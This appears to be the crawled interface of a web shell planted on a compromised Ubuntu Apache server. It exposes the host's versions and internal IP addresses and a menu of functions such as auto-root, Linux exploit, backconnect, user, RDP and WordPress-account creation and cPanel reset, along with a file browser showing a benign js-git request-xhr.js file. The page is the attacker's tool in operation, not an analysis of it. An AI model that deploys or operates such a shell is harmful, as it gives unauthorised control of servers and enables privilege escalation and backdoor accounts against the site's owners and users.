Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
js-git /
net /
[ HOME SHELL ]
Name
Size
Permission
Action
git-fetch-pack.js
4.98
KB
-rw-rw-r--
request-xhr.js
959
B
-rw-rw-r--
tcp-chrome-sockets.js
2.51
KB
-rw-rw-r--
tcp-node.js
1.7
KB
-rw-rw-r--
tcp-ws-proxy.js
1.69
KB
-rw-rw-r--
transport-http.js
3.21
KB
-rw-rw-r--
transport-tcp.js
1.2
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : request-xhr.js
"use strict"; module.exports = request; function request(method, url, headers, body, callback) { if (typeof body === "function") { callback = body; body = undefined; } if (!callback) { return request.bind(null, method, url, headers, body); } var xhr = new XMLHttpRequest(); xhr.open(method, url, true); xhr.responseType = "arraybuffer"; Object.keys(headers).forEach(function (name) { xhr.setRequestHeader(name, headers[name]); }); xhr.onreadystatechange = function () { if (xhr.readyState !== 4) return; var resHeaders = {}; xhr.getAllResponseHeaders().trim().split("\r\n").forEach(function (line) { var index = line.indexOf(":"); resHeaders[line.substring(0, index).toLowerCase()] = line.substring(index + 1).trim(); }); callback(null, { statusCode: xhr.status, headers: resHeaders, body: xhr.response && new Uint8Array(xhr.response) }); }; xhr.send(body); }
Close